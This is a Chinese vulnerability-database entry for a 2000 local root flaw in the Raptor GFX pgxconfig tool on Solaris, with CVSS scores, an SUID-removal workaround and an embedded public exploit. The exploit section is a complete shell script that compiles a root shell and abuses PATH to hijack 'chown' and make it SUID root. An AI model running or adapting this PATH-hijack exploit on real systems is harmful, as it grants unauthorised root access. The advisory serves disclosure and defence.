发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:39

[原文]pgxconfig in the Raptor GFX configuration tool uses a relative path name for a system call to the "cp" program, which allows local users to execute arbitrary commands by modifying their path to point to an alternate "cp" program.

[CNNVD]Raptor GFX pgxconfig命令执行漏洞(CNNVD-200010-051)

        Raptor GFX配置工具中的pgxconfig使用“cp”程序调用系统的相关路径名,本地用户可以利用该漏洞通过修改其指向交替“cp”程序的路径执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20000802 Local root compromise in PGX Config Sun Sparc Solaris

- 漏洞信息

Raptor GFX pgxconfig命令执行漏洞
高危 未知
2000-10-20 00:00:00 2005-10-12 00:00:00
        Raptor GFX配置工具中的pgxconfig使用“cp”程序调用系统的相关路径名,本地用户可以利用该漏洞通过修改其指向交替“cp”程序的路径执行任意命令。

- 公告与补丁


- 漏洞信息 (20147)

Tech-Source Raptor GFX PGX32 2.3.1 Config Tool Vulnerability (EDBID:20147)
solaris local
2000-08-02 Verified
0 suid
N/A [点击下载]

Raptor GFX cards are designed to handle 24-bit true color applications such as Netscape, seismic, geographical information systems (GIS), satellite imaging, pre-press imaging and general desktop use. They can also be used for high resolution 8-bit applications such as Insignia's SoftWindows, medical imaging and many legacy applications.

Certain versions of the software shipped to configure the Raptor GFX cards are vulnerable to an PATH environment variable attack due to insecure code within pgxconfig the main configuration utility. In particular the pgxconfig uses an insecure system call (system(3s). This function effectively executes binaries resident on the system from within the program. Given that this call must execute binaries on the system at hand it relies on the $PATH variable to tell it where the system binaries reside. This variable is configurable by the user, and therefore a user can provide there own binary to be executed. In this particular case because the program also issues a setuid(0) call (a call which set's the UID of the process in this case, root) the program which the user substitutes is executed as root.


        # TechSource Raptor GFX configurator root exploit

        # unfortunately a compiler must be installed to use this example
        # exploit. however there's a million ways around this you know
        # on my system , gcc isnt in my path

        # build a little prog nothing new here folks
        echo '#include<stdio.h>' > ./x.c
        echo 'int main(void) { setuid(0); setgid(0); execl
("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
        gcc x.c -o foobar
        rm -f ./x.c

        # build a substitute chown command. i much prefer this over
        # regular chown
        echo "#!/bin/sh" > chown
        echo "/usr/bin/chown root ./foobar" >> chown
        echo "/usr/bin/chmod 4755 ./foobar" >> chown
        chmod 0755 chown

        # oooh look its the magical fairy path variable
        export PATH=.:$PATH
        # heres one way to skin a cat
        # (theres more, some need valid devices. excercise for the readers)
        /usr/sbin/pgxconfig -i
        rm -f chown



- 漏洞信息

Raptor GFX pgxconfig Path Subversion Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

Raptor GFX contains a flaw that may allow a local attacker to gain root privileges. The issue is due to the a flaw in the "pgxconfig" utility that allows an attacker to specify an arbitrary path to the "cp" program. If an attacker uses a specially crafted program in its place, it will be called allowing execution of arbitrary commands with root privileges.

- 时间线

2000-08-02 Unknow
2000-08-02 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: change permissions on pgxconfig to remove the SUID bit

- 相关参考

- 漏洞作者